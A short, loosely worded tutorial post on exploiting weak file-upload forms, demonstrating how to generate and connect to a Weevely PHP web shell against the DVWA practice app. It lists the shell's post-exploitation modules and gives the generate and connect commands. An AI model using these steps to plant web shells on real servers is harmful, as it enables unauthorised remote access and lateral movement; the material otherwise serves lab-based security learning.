Hello friend’s, Today we are going learn about very common vulnerability of website. Lots of website include contact form or registration form or something uploading form like images, doc files, etc. If the coding is weak at that point and luckily an attacker exploit that vulnerability. Like an attacker about to upload some executable files for ex: on apache server .php can compile and able to perform various operations. So if an attacker able to upload a reverse php shell on that particular target, then he/she able to get remote access of the target system.
Weevely is a web shell designed for post-exploitation purposes that can be extended over the network at runtime.
Upload weevely PHP agent to a target web server to get remote shell access to it. It has more than 30 modules to assist administrative tasks, maintain access, provide situational awareness, elevate privileges, and spread into the target network.
- Shell access to the target
- SQL console pivoting on the target
- HTTP/HTTPS proxy to browse through the target
- Upload and download files
- Spawn reverse and direct TCP shells
- Audit remote target security
- Run Meterpreter payloads
- Port scan pivoting on target
- Mount the remote filesystem
- Bruteforce SQL accounts pivoting on the target
For this demonstration, I am using DVWA – Damm Vulnerable Web Application, Which is freely available. If you don’t know how to Setup DVWA refer this link https://youtu.be/3IdVWz_RaZo and set security priority to Low.
Generate php file using Weevely
weevely generate 123456 hack.php //where 123456 is password while you will try to connect to the victim and hack.php is file name, any name you can give.
After creation of file try to upload it on your target system
Connect to the Victim
weevely [url of our php file] password
Ex: weevely http://192.168.0.101/dvwa/hackable/uploads/hack.php 123456
After getting successful connection you can able to perform lots of action, for better understanding go with virtual learning.